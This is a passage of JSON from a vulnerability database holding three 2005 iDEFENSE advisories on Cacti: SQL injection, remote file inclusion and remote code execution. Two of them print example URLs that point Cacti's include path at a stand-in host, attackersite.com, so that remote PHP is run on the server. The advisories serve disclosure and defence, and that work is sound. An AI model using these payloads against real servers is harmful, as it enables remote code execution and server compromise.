"cpe:2.3:a:the_cacti_group:cacti:0.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.6d:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.8.5a:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:the_cacti_group:cacti:0.6.8a:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:13", "description": "Multiple Vendor Cacti Multiple SQL Injection Vulnerabilities \r\n\r\niDEFENSE Security Advisory 06.22.05\r\nwww.idefense.com/application/poi/display?id=267&type=vulnerabilities\r\nJune 22, 2005\r\n\r\nI. BACKGROUND\r\n\r\nCacti is a round-robin database (RRD) tool that helps create graphs from\r\n\r\ndatabase information and is available on multiple Linux distributions. \r\n\r\nII. DESCRIPTION\r\n\r\nRemote exploitation of an input validation vulnerability in various\r\nvendors implementations of Cacti graph creation tool allows an attacker\r\nto make arbitrary SQL queries.\r\n\r\nCacti contains an input validation error in the config_settings.php\r\nscript which allows an attacker to execute arbitrary SQL queries. This\r\nin effect allows an attacker to recover the administrative password for\r\nthe Cacti installation. Various scripts are vulnerable to SQL injection\r\nusing the 'id' variable.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation of this vulnerability allows a remote attacker \r\nto gain access to the encrypted administrative password for Cacti. An \r\nattacker can then attempt to crack the password and gain administrative \r\naccess.\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has confirmed the existence of this vulnerability on Cacti \r\n0.8.6c. Earlier versions are suspected vulnerable. The following vendors\r\n\r\ndistribute susceptible Cacti packages within their respective operating \r\nsystem distributions: \r\n \r\n The FreeBSD Project \r\n Gentoo Foundation \r\n Novell, Inc. (SuSE) \r\n The Debian Project (SuSE) \r\n\r\nV. WORKAROUND\r\n\r\nRequire authentication to access the Cacti installation. Restrict access\r\n\r\nto web servers using Cacti to only trusted hosts.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nCacti 0.8.6e has been released to address this vulnerability and is\r\navailable for download at:\r\n\r\n http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz\r\n or\r\n http://www.cacti.net/downloads/cacti-0.8.6e.zip\r\n\r\nRelease notes for Cacti 0.8.6e can be found at:\r\n\r\n http://www.cacti.net/release_notes_0_8_6e.php\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-1525 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n05/12/2005 Initial vendor notification\r\n05/15/2005 Initial vendor response\r\n06/22/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2005 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "cvss3": {}, "published": "2005-06-22T00:00:00", "title": "[Full-disclosure] iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti Multiple SQL Injection Vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-1525"], "modified": "2005-06-22T00:00:00", "id": "SECURITYVULNS:DOC:8932", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8932", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:13", "description": "Multiple Vendor Cacti Remote File Inclusion Vulnerability\r\n\r\niDEFENSE Security Advisory 06.22.05\r\nwww.idefense.com/application/poi/display?id=265&type=vulnerabilities\r\nJune 22, 2005\r\n\r\nI. BACKGROUND\r\n\r\nCacti is a round-robin database (RRD) tool that helps create graphs from\r\n\r\ndatabase information and is available on multiple Linux distributions. \r\n\r\nII. DESCRIPTION\r\n\r\nCacti contains an input validation error in the top_graph_header.php \r\nscript that allows an attacker to include arbitrary PHP code from remote\r\n\r\nsites. This in effect allows arbitrary code execution with the \r\nprivileges of the web server. The vulnerability specifically exists due \r\nto the script trusting a user supplied library_path variable. The \r\nfollowing example demonstrates how this might be exploited: \r\n\r\nhttp://example.com/path_of_cacti/include/top_graph_header.php?config[lib\r\nrary_path]=http://attackersite.com/ \r\n\r\nIn this way, the files "http://attackersite.com/include/html_tree.php" \r\nand "http://attackersite.com/include/rrd.php" will be included and \r\nexecuted on the vulnerable server.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation of this vulnerability allows a remote attacker \r\nto gain shell access with the privileges of the web server. An attacker \r\ncan then attempt to escalate privileges using local exploits, possibly \r\nallowing a full root compromise.\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has confirmed the existence of this vulnerability on Cacti \r\n0.8.6d. Earlier versions are suspected vulnerable. The following vendors\r\n\r\ninclude susceptible Cacti packages within their respective operating \r\nsystem distributions: \r\n\r\n The FreeBSD Project\r\n Gentoo Foundation\r\n Novell Inc. (SuSE) \r\n\r\nDebian also includes a package for Cacti, however, it is an older, \r\nunaffected version.\r\n\r\nV. WORKAROUND\r\n\r\nRequire authentication to access the Cacti installation. Restrict access\r\n\r\nto web servers using Cacti to only trusted hosts.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nCacti 0.8.6e has been released to address this vulnerability and is\r\navailable for download at:\r\n\r\n http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz\r\n or\r\n http://www.cacti.net/downloads/cacti-0.8.6e.zip\r\n\r\nRelease notes for Cacti 0.8.6e can be found at:\r\n\r\n http://www.cacti.net/release_notes_0_8_6e.php\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-1524 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n05/12/2005 Initial vendor notification\r\n05/12/2005 Initial vendor response\r\n06/22/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nMaciej Piotr Falkiewicz and an anonymous researcher are credited with \r\nthis discovery.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2005 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "cvss3": {}, "published": "2005-06-22T00:00:00", "title": "[Full-disclosure] iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti Remote File Inclusion Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-1524"], "modified": "2005-06-22T00:00:00", "id": "SECURITYVULNS:DOC:8934", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8934", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:13", "description": "Multiple Vendor Cacti config_settings.php Remote Code Execution\r\nVulnerability\r\n\r\niDEFENSE Security Advisory 06.22.05\r\nwww.idefense.com/application/poi/display?id=266&type=vulnerabilities\r\nJune 22, 2005\r\n\r\nI. BACKGROUND\r\n\r\nCacti is a round-robin database (RRD) tool that helps create graphs from\r\n\r\ndatabase information and is available on multiple Linux distributions. \r\n\r\nII. DESCRIPTION\r\n\r\nCacti contains an input validation error in the config_settings.php \r\nscript which allows an attacker to include arbitrary PHP code from \r\nremote sites. This in effect allows arbitrary code execution with the \r\nprivileges of the web server. The vulnerability specifically exists due \r\nto the script trusting a user supplied include_path variable. The \r\nfollowing example demonstrates how this might be exploited: \r\n\r\nhttp://example.com/include/config_settings.php?config[include_path]=http\r\n://attackersite.com/ \r\n\r\nIn this way the file "http://attackersite.com/config_arrays.php" will be\r\n\r\nincluded and executed on the vulnerable server with the privileges of \r\nthe web server.\r\n\r\nIII. ANALYSIS\r\n\r\nSuccessful exploitation of this vulnerability allows a remote attacker \r\nto gain shell access with the privileges of the web server. An attacker \r\ncan then attempt to escalate privileges using local exploits, possibly \r\nallowing a full root compromise.\r\n\r\nIV. DETECTION\r\n\r\niDEFENSE has confirmed the existence of this vulnerability on Cacti \r\n0.8.6c. Earlier versions are suspected vulnerable. The following vendors\r\n\r\ninclude susceptible Cacti packages within their respective operating \r\nsystem distributions: \r\n\r\n The Debian Project\r\n The FreeBSD Project \r\n Gentoo Foundation \r\n Novell Inc. (SuSE) \r\n\r\nV. WORKAROUND\r\n\r\nRequire authentication to access the Cacti installation. Restrict access\r\n\r\nto web servers using Cacti to only trusted hosts.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nCacti 0.8.6e has been released to address this vulnerability and is\r\navailable for download at:\r\n\r\n http://www.cacti.net/downloads/cacti-0.8.6e.tar.gz\r\n or\r\n http://www.cacti.net/downloads/cacti-0.8.6e.zip\r\n\r\nRelease notes for Cacti 0.8.6e can be found at:\r\n\r\n http://www.cacti.net/release_notes_0_8_6e.php\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-1526 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n05/12/2005 Initial vendor notification\r\n05/15/2005 Initial vendor response\r\n06/22/2005 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nMaciej Piotr Falkiewicz is credited with this discovery.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.idefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright (c) 2005 iDEFENSE, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDEFENSE. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n\r\n_______________________________________________\r\nFull-Disclosure - We believe in it.\r\nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\r\nHosted and sponsored by Secunia - http://secunia.com/", "edition": 1, "cvss3": {}, "published": "2005-06-22T00:00:00", "title": "[Full-disclosure] iDEFENSE Security Advisory 06.22.05: Multiple Vendor Cacti config_settings.php Remote Code Execution Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2005-1526"], "modified": "2005-06-22T00:00:00", "id": "SECURITYVULNS:DOC:8933", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8933", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
